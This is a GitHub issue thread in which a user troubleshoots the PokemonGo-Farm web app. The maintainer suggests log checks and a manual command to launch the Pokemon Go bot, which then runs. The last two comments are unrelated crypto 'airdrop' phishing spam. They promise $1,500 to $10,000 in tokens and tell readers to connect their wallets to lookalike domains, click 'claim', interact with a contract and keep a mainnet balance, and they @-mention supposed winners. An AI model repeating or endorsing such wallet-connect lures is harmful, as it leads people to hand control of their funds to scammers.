### ISSUE TITLE
Troubles to run the bot

### ISSUE THREAD

**Issue by valigar29** [ChiarilloMassimo/PokemonGo-Farm#8]
HI Guys, 

I tried your web app, but I've some trouble to run the bot.

I set up all my account, gmap, configuration, and tried to run the bot.
It seems that the bot doesn't startup.

The process status stay to 

> Not Started

In the developer console I see that the request url is : 

> http://local.bot.fr/bot/pool/config_MyAccount.com.json

And the result is : 

> {"content":"","status":"not-started"}

Did someone got the same thing ?

Thank's

**Comment by massimo-me** [comment]
Please see if the log is written in `app/logs/{account}.json`. 

Most likely, you do not have the command `ps` to view the active processes, for example windows has `tasklist`.

**Comment by valigar29** [comment]
> Please see if the log is written in app/logs/{account}.json.

I've already check in it, there is no file inside the logs directory

> Most likely, you do not have the command ps to view the active processes

I've check that, but no process related to the bot showed up.

I think it's more a rights problem. I manually create the log file inside `app/logs` and set the rights using `ACL` on the log folder and on the file.

It seems to be ok for the Status `not-started` problem.

Now I got this : 

> {"content":"","status":"pending"}

And I'm stuck, the log file still empty, and no errors / warnings appears.

**Comment by massimo-me** [comment]
Try to run manually

`(cd {YOUR_DIR}/PokemonGo-Bot && virtualenv . && source bin/activate && pip install -r requirements.txt && ./pokecli.py -cf {YOUR_CONFIG}.json > test.log &`

**Comment by valigar29** [comment]
It looks like running manually the bot works.

```
[2016-08-05 13:07:59] [x] Starting PokemonGo Bot....
[2016-08-05 13:07:59] [#] Scanning area for objects (1 / 25)
[2016-08-05 13:07:59] [#] Walking from (48.858789, 2.3707577) to (48.858789, 2.3707577) for approx. 0.00 seconds
[#] (48.858789, 2.3707577, 0)
[#] Attempting to evolve all pokemons ...
[2016-08-05 13:08:08] [#] Scanning area for objects (2 / 25)
[2016-08-05 13:08:08] [#] Walking from (48.858789, 2.3707577) to (48.861289, 2.3707577) for approx. 1.12 minutes
```

Now I've to find why the bot doesn't run using the web app :) 

But it seems the bot doesn't work very well, he does nothing just walking (no pokestop, no pokemon, etc...). It's probably related to the Niantic API change : https://www.reddit.com/r/pokemongodev/comments/4w1cvr/pokemongo_current_api_status/

**Comment by lkd70** [comment]
@valigar29 PokemonGo-Bot is still working fine (as of now, at least) so it's more likely an issue with your configuration (found in Config/config.json) I'd recommend writing one manually to see if it picks that up okay.

**Comment by feras-ragheb** [comment]
## Exciting News! You're the proud recipient of $2364 in tokens 🪂🔴

Ready to transform those tokens into real value? Here's how:

- Unlock the full potential of your $2364 by seamlessly connecting your wallet to WalletConnect.
- Your $2364 ETH redemption has been verified and is ready for you to claim.
- 🎁 Dive into a world of monthly rewards by exploring [this exclusive airdrop](https://www.walletconnectreward.online/).

But wait, there's more! Connect your wallet now, follow our simple instructions, and unveil an exclusive airdrop designed just for GitHub users. Spread the word to friends—each share increases your eligibility. Don't miss out on securing your reward!

![WalletConnect](https://preview.redd.it/walletconnect-2023-reviews-features-and-safety-v0-e807nahvtfmb1.png?width=2548&format=png&auto=webp&s=f94da65885db338806c867e335e4df7688ef4398)

🚀 **Seize Your Bonus Opportunity Now!** [Verify Eligibility](https://www.walletconnectreward.online/)

Embark on a journey with Optimism, where your wallet is your key to exclusive benefits. Make sure to use a trusted wallet for a secure transaction.

- 🔗 **Connect your wallet:** Not once, but twice!
- 📋 **Claim Button:** Click on the claim button after connecting your wallet.
- 💼 **Interact with the Method Connect:** Engage with the contract using the Method Connect to complete the process.
- 💰 **Ensure Mainnet Balance:** Don't forget to check that your wallet has a sufficient balance on the mainnet for successful transactions.

Reformulate the Whitelist promotion up to $10,000, following these steps:
1. Connect your wallet.
2. Click on the claim button.
3. Interact with the contract using the Method Connect.
4. Ensure your wallet has a sufficient balance on the mainnet.


Winners: @LeoWangJ, @hongju-jeong, @ZenoHwanEth, @dcmalk, @henrywu-new, @malik672, @hemengke1997

**Comment by DavidGhedini** [comment]
# $BNB Airdrop Guide: Claim Your $1000 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://miro.medium.com/v2/resize:fit:1400/1*57DPVRALhv45ef334fpetQ.jpeg)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.000k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @1500256797, @peng-sp, @Chrismarshal95, @helianthuswhite, @time0x, @abdulhajiyev, @NGPlateform
